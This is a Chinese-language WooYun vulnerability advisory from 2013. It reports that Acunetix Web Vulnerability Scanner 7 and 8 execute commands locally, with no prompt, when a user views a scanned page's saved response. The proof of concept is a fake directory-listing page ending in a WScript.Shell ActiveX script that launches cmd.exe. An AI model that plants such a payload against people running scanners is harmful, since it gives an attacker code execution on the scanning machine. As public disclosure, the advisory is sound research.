当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034096

漏洞标题:Web Vulnerability Scanner 远程命令执行漏洞

相关厂商:Acunetix

漏洞作者: 爱梅小礼

提交时间:2013-08-11 15:02

修复时间:2013-11-09 15:03

公开时间:2013-11-09 15:03

漏洞类型:远程代码执行

危害等级:中

自评Rank:7

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-11-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

WVS7、8跨本地执行命令,无任何安全提示。
ps:日站还是被别人日,是一个非常值得研究的问题。

详细说明:

WVS将有漏洞的页面下载到本地,用户查看时使用IE框架加载,使用的是本地权限,用wscript.shell执行命令无任何安全提示。

QQ截图20130811144330.jpg

漏洞证明:

测试环境:
WVS7或8+IE8
构造一个假的有漏洞的页面。我构造了一个列目录漏洞,注意代码的最后面是调用wscript组件执行命令
index.php:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<li><a href="NOTEPAD.EXE"> NOTEPAD.EXE</a></li>
<li><a href="dossier.gif"> dossier.gif</a></li>
<li><a href="download.php"> download.php</a></li>
<li><a href="loader.html"> loader.html</a></li>
<li><a href="logo_i.gif"> logo_i.gif</a></li>
<li><a href="manager.php"> manager.php</a></li>
<li><a href="test.php"> test.php</a></li>
</ul>
</body></html>
<SCRIPT Language="JavaScript">
WSH=new ActiveXObject("WScript.Shell");
WSH.run("cmd.exe");
</SCRIPT>


用WVS扫描网站,果然爆出了列目录,选择它,会如图所示:

222.jpg


找到右边的View HTTP response,单击它,就会运行cmd.exe,且没有任何安全提示。

3333.jpg

修复方案:

这种事情你比我专业

版权声明:转载请注明来源 爱梅小礼@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝